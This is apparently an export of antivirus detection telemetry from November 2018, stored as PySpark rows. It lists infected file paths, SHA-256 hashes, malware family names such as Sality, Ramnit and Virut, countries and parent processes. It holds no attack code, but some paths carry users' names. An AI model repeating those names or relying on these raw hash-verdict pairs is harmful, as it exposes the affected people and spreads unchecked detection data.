  Row(detection=Row(filename='utps_addrbook_task_00011.html', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\UTPS\\common\\usermanual\\bg\\plugins\\AddrBookUIPlugin\\utps_addrbook_task_00011.html', filesize=228000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='aaaa60c55bf4c4663c2e749470786c4ece2fb2294a597d02c948c11b8305ce41', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\brave.exe', parentsize=1761256, timestamp='2018-11-02T13:01:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152313-4171afde', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15e3e13\\AVSCAN-20181102-094231-829B20AD\\AVSCAN-20181102-152313-4171AFDE', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:23:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00658e46', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00658e46', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:45:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8f0b5617e5fa994482faf617e7d5495d00674f7d8e92d1cdc31196e287c4e2f7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8F0B5617E5FA994482FAF617E7D5495D00674F7D8E92D1CDC31196E287C4E2F7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8f0b5617e5fa994482faf617e7d5495d00674f7d8e92d1cdc31196e287c4e2f7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:00:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='71e4d9ace1c4d19f9a8f0031c846f836378f2ea069b5133a0ce41a45f4917180', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-5\\71E4D9ACE1C4D19F9A8F0031C846F836378F2EA069B5133A0CE41A45F4917180', filesize=52000, name='HTML/ExpKit.Gen2.#M1.#R1'), hash='71e4d9ace1c4d19f9a8f0031c846f836378f2ea069b5133a0ce41a45f4917180', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:41:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\Equihash\\NVIDIA\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='x -iext -ow -ver -- \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Compressed\\\\\\\\Setup.zip\\\\\\" C:\\\\\\\\Users\\\\\\\\Eng.Ramy\\\\\\\\Downloads\\\\\\\\Compressed\\\\\\\\', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1037824, timestamp='2018-11-02T20:54:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T11:16:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='spanish.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\LANGUAGE\\SPANISH\\SPANISH.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e82b3935870df0344fbde79f0ab41a998ccb9c9cace45fd749bac407960e27e4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='htccalc.exe', filepath='E:\\Program Files\\Volcano Team\\VolcanoBox\\bin\\HTCCALC.exe', filesize=3392000, name='W32/Sality.AT.#M1.#R1'), hash='b16a7a4ce90fc171865e7f21d412477e5e67e9c536b079fa05ff370cad3ce05e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:11:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='proquota.exe', filepath='E:\\WINDOWS\\ServicePackFiles\\i386\\proquota.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='b9fcf5356958e1adde749771f7c38ddaa2332a18e3c027a89d24c58849bfdd7d', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:37:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chisu.dll', filepath='C:\\Windows\\chisu.dll', filesize=192000, name='TR/Black.Gen2.#M300.#R100338'), hash='b124b6665445188efb183c3d638dde8aee99bf8072b6bb30a9eceb0c4ec4f7ce', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T09:19:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gsdx32-avx2.dll', filepath='C:\\Users\\X\\Documents\\WinDS PRO Apps\\windsproapps\\app\\PCSX2_121\\plugins\\GSdx32-AVX2.dll', filesize=1024000, name='W32/Ramnit.CD.#M1.#R1'), hash='c800811d92bbbb629dcb9430f19627d3b3c2774e833a95aebfe5c1b15cb538f0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T04:20:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064727-43d45106', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9625a9be\\AVSCAN-20181102-064112-1C8CC88F\\AVSCAN-20181102-064727-43D45106', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T22:52:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cf0e6d38cc66b56b5f7151dae565a91033bd4e1b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\cf0e6d38cc66b56b5f7151dae565a91033bd4e1b', filesize=2112000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='ea3ac7c876d956978ca9e70c5651ab877d5bb7267725a21d613248ae8e19c008', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:15:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trzfa15.tmp', filepath='\\\\?\\C:\\Applications\\trzFA15.tmp', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:00:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cell.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Cell\\Cell.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='9af2aca515270d38ecd3e763b32a69c333c89c8c5493b3ec37ecc2f17e7c1692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloader-fuer-automan.exe', filepath='D:\\PROG-SAMMLUNG-TOOLS\\!!!!!________NEUE SOFTWARE_!!!\\Downloader-fuer-automan.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='8d12098f11cfd65e18472f19c73b57a4f27879830d0394de48d1455636dbcebe', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:15:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='C:\\AdwCleaner\\Quarantine\\C\\Users\\Rinze\\AppData\\Local\\Smartbar\\Application\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='aad33d366186a6aa81e97c90af4d24dde314733425a12a6080d83a1bb17203d1', metadata=Row(cmdline='-k localsystemnetworkrestricted -p -s fhsvc', country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T14:54:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='panorama.dll', filepath='C:\\Program Files (x86)\\Steam\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:03:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='04d8636913c370e77e69f1cdc6b18998', filepath='e:\\sample\\20181102_sample\\04D8636913C370E77E69F1CDC6B18998', filesize=512000, name='HEUR/AGEN.1033395.#M1.#R1'), hash='d8d9da1fddfb6f994cf7a5c1d008d6099a9c9ea4776466409d8f98b0b627a4db', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:19:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rarrepairtool.exe', filepath='H:\\HBCD\\Programs\\RARREPAIRTOOL.EXE', filesize=64000, name='TR/Siggen.64000.7.#M1.#R1'), hash='c030b37c4066998c7686b51d6cd8690308eeeadbec7712a6ae6190b18fd40916', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:34:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup (11).exe', filepath='C:\\Users\\X\\Downloads\\Setup (11).exe', filesize=460000, name='PUA/DomaIQ.Gen.#M300.#R5434'), hash='e75c7c9b535c57aed80938af4cc1082d470317b4181fffa50c276b086c641346', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T18:56:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201453-824d9639', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-201453-824D9639', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:14:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rkbatchtool.exe', filepath='E:\\Box Files\\SPDMTK_FILES\\Torque\\DROIDZ DUO Slim\\Rockchip_Batch_Tool_v1.7\\Rockchip_Batch_Tool_v1.7\\RKBatchTool.exe', filesize=1024000, name='W32/Sality.AG.#M1.#R1'), hash='b51869f1de40bbb17a0f5f60dda65df7887ea8772d17f3e7a3a6bf06f15d922d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BlueStacks\\HD-Network.exe', parentsize=451800, timestamp='2018-11-04T05:56:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140235-f33b63b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-140235-F33B63B4', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:02:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b6b2', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b6b2', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:16:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023dff6', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023dff6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:55:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a39a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a39a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:56:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dragonbar.exe', filepath='C:\\Program Files (x86)\\Common Files\\Nuance\\NaturallySpeaking13\\dragonbar.exe', filesize=744000, name='W32/Neshta.A.#M1.#R1'), hash='bdab58f930629b5387c13e67c2f21ad957de9229cd22437f4f22fece9c80c0be', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\IObit Malware Fighter\\IMFsrv.exe', parentsize=2396944, timestamp='2018-11-04T16:02:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220740-a2941f7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b99be261\\AVSCAN-20181104-220659-9C613E7F\\AVSCAN-20181104-220740-A2941F7F', filesize=15232000, name='HEUR/AGEN.1008572.#M1.#R1'), hash='b2c3f852e43ff4ddc1cf2eb945f06c846acb6fcf0adb9b44f8125635c7397dc3', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:07:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090104-9aef866d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085639-77757895\\AVSCAN-20181104-090104-9AEF866D', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:00:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-083132-80e1f0c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c3181048\\AVSCAN-20181104-083023-74D4EE5E\\AVSCAN-20181104-083132-80E1F0C3', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:31:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='caption.htm', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Presets\\WebContactSheet\\Vertical Slide Show 1\\Caption.htm', filesize=216000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='dd3e711bdc560223afaf71ce85a22075c8eba53eb60b364531e22fa182d06a1d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T06:34:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f48cc37dfee4705a56c224430b8bf84c3e6994dc14ff535bccfb69887b240639', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-16.categorizing\\F48CC37DFEE4705A56C224430B8BF84C3E6994DC14FF535BCCFB69887B240639', filesize=256000, name='W32/Sivis.A.#M1.#R1'), hash='f48cc37dfee4705a56c224430b8bf84c3e6994dc14ff535bccfb69887b240639', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:38:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183207-489d3d41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183207-489D3D41', filesize=64000, name='VBA/Dldr.Agent.mluun.#M1.#R1'), hash='fafbd357ed3a1742e58426e8a0b46c9ccc7543274499cac55713f559eabdbd78', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:32:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aiframe_data.exe', filepath='E:\\picture\\งานแต่งอิ๊ดลำปาง\\เหรียญโปรย\\viewdiary.php_files\\support_data\\aiframe_data\\aiframe_data.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='f9bf64adfca71c94a7c80a12db4e82f1fcf04e984420a3a5fe66bf0012ab281e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:40Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-11-30-14.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-29T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T02:29:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='337e8ed599121fc14851f4321067e8a572724168e8504b66af2f32c4da60083f', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T10:34:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe858_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe858 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:47:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T07:42:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\LOCAL\\Temp\\tmp7990782\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:31:56Z'), dt=datetime.date(2018, 11, 2)),
